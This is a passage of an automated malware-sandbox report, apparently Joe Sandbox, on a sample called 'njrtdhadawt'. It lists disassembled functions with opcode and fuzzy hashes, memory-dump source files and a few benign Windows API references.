                                                                                                                                                                                                                                                          • Opcode ID: feb54161888999bcb99538d6c180b29c1924a711f8f1d72458296d7c0413c582
                                                                                                                                                                                                                                                          • Instruction ID: e88ae035013c5a4987859cc662f6ed463265692ab8a78b55ead4bb428f14adeb
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: feb54161888999bcb99538d6c180b29c1924a711f8f1d72458296d7c0413c582
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5B12731610608DFD705CF29D486B55BBA0FF45368F358699E8EACFAA1C335E982CB40
                                                                                                                                                                                                                                                          Function 6CD613D6 Relevance: 1.7, APIs: 1, Instructions: 242COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CD613EC
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2325560087-0
                                                                                                                                                                                                                                                          • Opcode ID: a70fa59f28df80cf1eed83471fdcd7d361c6df448da2beb96d670386bec9f903
                                                                                                                                                                                                                                                          • Instruction ID: e111222ad04848dd70f5a67be7ae889788548c40c0411db27719849de0f1ae5f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a70fa59f28df80cf1eed83471fdcd7d361c6df448da2beb96d670386bec9f903
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5A19DB6A01205EFEB08CF66C88179EBBB9FB49324F25812AD515E7BD0D7349540CF64
                                                                                                                                                                                                                                                          Function 6CD6F340 Relevance: 1.7, Strings: 1, Instructions: 415COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • AuthenticAMDHygonGenuineGenuineIntel, xrefs: 6CD6F76E
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: AuthenticAMDHygonGenuineGenuineIntel
                                                                                                                                                                                                                                                          • API String ID: 0-1939122913
                                                                                                                                                                                                                                                          • Opcode ID: 40393414c02d3890c481cbbd95ad9d4d1c3a6d10108b169e65c98c55e7a5f1a6
                                                                                                                                                                                                                                                          • Instruction ID: 0c527ae18095ef20f985b3476e81f60e6d1a4ce3fb66c86f88f8ffaa238a224b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40393414c02d3890c481cbbd95ad9d4d1c3a6d10108b169e65c98c55e7a5f1a6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48D1A5B3F11A254BEB08CE99CC913ADB6E2EBC8354F19413ED916E7781DAB85D01C790
                                                                                                                                                                                                                                                          Function 6CD6717D Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 8e1be393d1c3e69c1dc880d41ae14993743e705bed56af1c96b552fe94b90347
                                                                                                                                                                                                                                                          • Instruction ID: 9a139e7ac075df67bf651683e2ce0f740b7095aef65a4743d8d2edef64e71799
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e1be393d1c3e69c1dc880d41ae14993743e705bed56af1c96b552fe94b90347
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5541A3B5C0521DAFDB10DF6ACC88AEABBB9AB45304F1542D9E419D3A10DB349E85CF60
                                                                                                                                                                                                                                                          Function 6CD52290 Relevance: 1.6, Strings: 1, Instructions: 383COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: UNC\
                                                                                                                                                                                                                                                          • API String ID: 0-505053535
                                                                                                                                                                                                                                                          • Opcode ID: 62fc80015957b1a0b9fc270006ef3489bcc20f8097c793583721349e17b7cd7f
                                                                                                                                                                                                                                                          • Instruction ID: ee2759afdfb5390495339661227502372e2f4792bf7ce505a51e36b4d64c1333
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62fc80015957b1a0b9fc270006ef3489bcc20f8097c793583721349e17b7cd7f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7E17071D04155CFDF00CF19C8983AEBBF26B8531CF998169C4A45B6E2C735895ECB90
                                                                                                                                                                                                                                                          Function 0100AFF6 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • EnumSystemLocalesA.KERNEL32(Function_0002AC61,00000001), ref: 0100B00F
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: EnumLocalesSystem
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2099609381-0
                                                                                                                                                                                                                                                          • Opcode ID: 82ffa43d55ad0ece1af5f9df8d3e1faf2b0ac10861a362024124ef295f3b9a16
                                                                                                                                                                                                                                                          • Instruction ID: bc480df7f3b828b41ff6d18f694225343bf642bf0fefec90aadbe6a3e2d8ec2f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82ffa43d55ad0ece1af5f9df8d3e1faf2b0ac10861a362024124ef295f3b9a16
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0ED05E71A107019BE7218F35D9497E177E0EB41B16F20994DDDD2860C1D6B460868640
                                                                                                                                                                                                                                                          Function 010070CE Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0002708C), ref: 010070D3
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                                                                                                          • Opcode ID: 2a6ee74febe6b2899abe14cd342bad32124384e88427a7c84745717ab340c43f
                                                                                                                                                                                                                                                          • Instruction ID: dafafe1b918ad62f2434c503a8fe109ca5abe47ba075fc952cfbdeb8df1bc967
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a6ee74febe6b2899abe14cd342bad32124384e88427a7c84745717ab340c43f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 199002B4291101C7A76257B19C5944635A05A49522F810595F0C1C9048DE5A50406672
                                                                                                                                                                                                                                                          Function 6CD1257C Relevance: .8, Instructions: 823COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 65e2e965be29e1b06b8377e557d5b7f45b8ca958c6d5b30c8a6c943f7630a3f0
                                                                                                                                                                                                                                                          • Instruction ID: 5406594ba8a8eb7fa569aedfcef38121c4760f47b7df672be746c0be6f24f132
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65e2e965be29e1b06b8377e557d5b7f45b8ca958c6d5b30c8a6c943f7630a3f0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC8201B5904F448FD365CF29D880B92B7F1BF4A314F108A2ED9EA87B61DB31A545CB90
                                                                                                                                                                                                                                                          Function 6CD2CEB0 Relevance: .6, Instructions: 649COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: c5810bfcf3800ef45da281cc6d8d74d7c52ad4c00dc25541d694837f7003ae28
                                                                                                                                                                                                                                                          • Instruction ID: 20e93de2a9e8428449aba8bee3a5a02a909be4aeb1df8f4cc03a6d6afa03df8e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5810bfcf3800ef45da281cc6d8d74d7c52ad4c00dc25541d694837f7003ae28
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C4281B06056458FD325CF19C090B21FBE1BF8631DF288A5DC6DA8BB61D639E485CB91
                                                                                                                                                                                                                                                          Function 6CD5EC60 Relevance: .5, Instructions: 501COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 099b9293bad30c3f1517be9d0f1813eed25ca217bf6ef9c0669197f189d6837b
                                                                                                                                                                                                                                                          • Instruction ID: bf316cb4913fd445df448c2dfa4470df9375c1ec75b992d353f729d56093bf74
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 099b9293bad30c3f1517be9d0f1813eed25ca217bf6ef9c0669197f189d6837b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32022371E042268FDB01CF69C4806ABB7F2AFDA344F55831AE854B7A60D775AD428BD0
                                                                                                                                                                                                                                                          Function 0100C7CE Relevance: .5, Instructions: 489COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: c6ae51a04c77d79d836c33477d25d55275c55b391888fb3a5948b5e8d7ba153a
                                                                                                                                                                                                                                                          • Instruction ID: 813aa001f21478b4cffbe1c1a0813aceadb466431bb1b1cc368d3af81a748cd4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c6ae51a04c77d79d836c33477d25d55275c55b391888fb3a5948b5e8d7ba153a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00028F23D49AB64BBBB34EFD459062A7EE05E0195070F47E9DED43F1C6C212EE0696E0
                                                                                                                                                                                                                                                          Function 6CD3D8F0 Relevance: .5, Instructions: 482COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: a2f28acfb72e2eb391861b5367c3ce58d120840e0460512695ded1a5f8df29b7
                                                                                                                                                                                                                                                          • Instruction ID: ec2920b848a7babb7c482d6b949e1b348cff6a637c8dff97b7d10641119922fd
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2f28acfb72e2eb391861b5367c3ce58d120840e0460512695ded1a5f8df29b7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7022070A193258FD7018F29D88035AB7E2AFAA354F14D72DE89C9B7A1D731E885CB41
                                                                                                                                                                                                                                                          Function 6CD2A700 Relevance: .4, Instructions: 418COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: a38bdc75a73da3a6de0d848628b9a9c44b940f08e54830d9ce6bc3fa7a9d2cb4
                                                                                                                                                                                                                                                          • Instruction ID: b6b0bf14d9cfaa2852eb78451e7e84c1e74e9b0ddebab81c084ff7b88ef35eb2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a38bdc75a73da3a6de0d848628b9a9c44b940f08e54830d9ce6bc3fa7a9d2cb4
